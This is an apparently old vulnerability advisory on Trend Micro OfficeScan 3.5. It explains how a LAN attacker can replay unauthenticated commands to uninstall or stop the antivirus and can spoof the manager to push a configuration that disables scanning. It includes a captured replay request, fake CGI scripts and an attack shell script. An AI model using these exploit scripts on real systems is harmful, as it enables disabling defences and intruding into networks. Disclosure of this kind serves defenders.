COMMAND
OfficeScan
SYSTEMS AFFECTED
TrendMicro OfficeScan
PROBLEM
Gregory Duchemin found following. All of you have certainly seen
the possibly general dos attack against OfficeScan just by
connecting a client to the port 12345 without sending any TCP FIN
packet at the application time-out. After several tests on
OfficeScan 3.5, Gregory realized there were numerous other
security flaws resulting in possible intrusion scenarios and
because of a lack of authentication/crypto protocol between
clients and manager. OfficeScan can be potentially used as a
trojan horse with some preliminaries steps resulting in a remote
intrusion on every LAN workstations. Systems concerned are
Windows 95, 98, 2000 and NT
The internal network malicious user can:
1- remotely uninstall the anti virus
2- remotely start the scan on the machine
3- remotely stop the scan
4- remotely make the anti virus inefficient by modifying the
scan configuration file through the network on the target
pc.
5- and finally, remotely write anywhere on the target file
system!.
Step 1- Replay Attack (simplest way to gain a general DOS over the LAN)
=======================================================================
The first thing to do for the LAN attacker is to sniff its own PC
with OS installed on it then he has to catch an admin. Packet
toward any 12345 Scan Office port to replay the same request. An
example of such a request:
. . G E T / ? 0 5 6 8 0 F 5 4 5 E 8 8 A E D 5 3 9 2 B 8 8 5 E E 7 1 4
2 D
8 B B F 8 E 3 5 2 6 9 3 7 2 5 4 3 0 D C 1 E 7 F 9 5 4 F B 3 4 5 F E 8 9
9 F
0 1 2 0 3 B 2 2 2 C F A F 8 B 0 5 C A 5 D 9 0 C F 5 D E E 7 3 8 1 0 2 A
B 1
C A E E E 6 2 F 7 F 4 A A 3 6 E C D 2 0 C B 5 E A D E C 2 C 5 4 7 7 6 6
5 0
D 5 5 5 A 9 4 1 5 B E 5 3 4 8 E 7 F 0 0 F 9 8 1 A 5 D B E E 1 F 3 A B 3
0 F
A B C 4 3 3 2 3 0 F 6 6 B 4 9 9 8 2 F D A 5 F 0 7 7 D 0 7 A F 7 2 1 C D
7 9
1 8 A 5 5 8 0 C 3 3 1 B C 4 C 2 A 9 5 9 B F 6 3 4 1 1 2 B 4 F 9 A 9 3 9
5 3
B 8 F 6 4 B 0 2 C 8 8 1 E D 6 C 5 5 B F C D 6 2 0 5 6 1 3 4 B B F 8 0 0
7 E
F F B 6 6 4 3 5 1 8 1 A 7 7 6 2 E E 0 2 B 8 9 1 3 F 5 4 5 D 2 5 1 1 8 9
7 C
8 9 8 F 3 E 5 3 B B 8 D 4 F 4 E C 7 1 E 7 F A C 6 D 8 E 2 6 D 3 E 5 5 A
9 A
7 C 1 E B 9 6 B D F D 2 B E 8 4 4 F C 5 E C 6 5 D A F 6 C 7 1 C 0 2 9 4
2 A
9 2 B B 9 7 8 A C 8 7 5 1 2 0 2 C 5 0 E E 4 0 4 4 5 D D 6 C D 1 1 C E 1
1 A
9 9 0 6 H T T P / 1 . 0 . . H o s t : X1.X2.X3.X4 : 1 2 3 4 5 . .
U s e r - A g e n t : O f f i c e S c a n / 3 . 5 . . A c c e p t :
* /
* . . . . . .
The exact format of the HTTP request isn't know...it may be a kind
of signature of the admin. Password and other local network
specifics information, may be not. More information about this
point will be welcomed. At least, the last 2 bytes in it (06 in
our example) is needed to code the type of request. Furthers
tests later, some of these codes was definitely identified:
03: used for the Alert.msg file on the remote system
04: uninstallation request
06: launch a virus scan on the PC
07: Stop the scan.
Because Tmlisten on the client side, doesn't check for a
particular admin. IP or any other authentication protocol, the
intruder can without any problem start a connection to the port
12345 and replay the request 03,04, 06 and 07. But if he wishes
to remotely modify the behavior of the anti virus, he'll have to
go to step 2.
Step 2- Remote manipulation (leading to hosts intrusions and/or general DOS)
============================================================================
Now a little more about Office Scan communication protocol. It
appears that client process communicate regularly with numerous
resident cgi on the manager side (with IIS installed on it) for,
among other things, file transfer purpose. When the two clients
services are launched (TmListen.exe and NTRScan.exe) they ask for
a cgi called cgiOnStart.exe. An example of such a request
(sniffit was used this time):
G E T / o f f i c e s c a n / c g i / c g i O n S t a r t . e x e ? U
I D = 4 6 3 1 8 5 3 0 - f 0 6 3 - 1 1 d 3 - 9 1 a e - 0 0 c 0 4 f 4 a 4
c 9
9 & D A T E = 2 0 0 0 0 3 0 3 & T I M E = 1 4 2 9 3 0 & C O M P U T E R
= N
OM & P L A T F O R M = W i n d o w s % 2 0 N T % 2 0 4 % 2 e 0 % 2 e 1 3
8 1 & I P = Y1.Y2.Y3.Y4 & P T N F I L E = 6 6 5 & P R O G R A M = 3 .
5 0 & E N G I N E = 5 . 1 0 0 & E N C Y = 3 5 & D O M A I N = H o f & H
O T
F I X = & I N S T D A T E = 2 0 0 0 0 3 0 2 & I N S T T I M E = 1 8 5 2
1 0
& M O B I L E = 0 & R E L E A S E = 3 . 5 0 H T T P / 1 . 0 . . A c c
e p
t : * / * . . U s e r - A g e n t : O f f f i c e S c a n N T C
l i
e n t . . H o s t : X1.X2.X3.X4 . . C o n n e c t i o n : K e e p -
A l i
v e
When the intruder send a 06 type request for remote scanning,
sniffer can catch some new requests toward the web port 80.
Figure:
ATTACKER
|
|
| 1/ Request 06
|
|
\/
[12345]
TARGET ----------------------> [80] Network Manager
2/ anti viral scan
<------1------ 3/ GET
/cgi/cgiOnStart.exe
<--- Cfg File---- 4/ GET
/cgi/cgiRqCfg.exe
<------------- 5/ GET
/cgi/cgiOnScan.exe
So when the scan start, the client ask the manager for a
configuration file that control many aspects of the processes.
The cgi cgiRqCfg .exe give a runtime generated configuration file
for the scan, in a plain text format over the network, the
different keywords present inside the file stay resident inside
the Windows registry. By spoofing the manager and carefully
design a web server with the same file structure and cgi name,
our intruder will be able to forge manually configuration files
and so to remotely modify the anti virus behavior. Figure:
ATTACKER (IP OF MANAGER)
| [80] cgiRqCfg.exe
| /\ |
06 | | | ( Infectious Configuration File )
| | |
\/ | \/
TARGET
MANAGER (disabled by IP spoofing)
What can we do with the configuration file???? Ok now just take
a look at the various keywords:
[Scan Now Configuration]"
UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Scan Memory=0
CompressedLayer=2
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=0
ScanFixedDisk=0
ScanCDRom=0
VirusFoundAction=5
BkUpIfClean=0
MoveDir=MANAGER\VIRUS
CleanFailedAction=3
CleanFailedMoveDir=MANAGER\\VIRUS
Reserved=
All this data are stored inside the
HKEY_LOCAL_MACHINE/Software/TrendMicro/PCCilin-NTCORP/CurrentVersion/RealTime Scan
registry key. By modifying the MoveDir and CleanFailedMoveDir bye
the value TARGET\\anywhere, it's possible to force the remote anti
virus to write all the infected file locally ANYWHERE on the file
system, that is to say in the Winnt directory too.
By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to
zero, it 's possible to force the anti virus to zero scan even if
the services are still alive. The method is far more stealth in
order to compromise a pc with a Trojan attached mail. Modify
ExtList with a ".txt" value will force anti virus to scan only txt
file. Source example of fakes cgi follows.
cgiRqCfg.exe:
=============
#!/bin/sh
echo "Content-type: text/plain"
echo
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="
cgiOnStart.exe
==============
#!/bin/sh
echo "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo
echo "1"
The little script for the scan request (Tr3ndAtt4ck.sh
target_client_ip):
#!/bin/sh
(
sleep 2
echo "GET
/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555
A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C
331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A
7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84
4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906
HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt
SOLUTION
Patch availability:
http://www.antivirus.com/download/ofce_patch.htm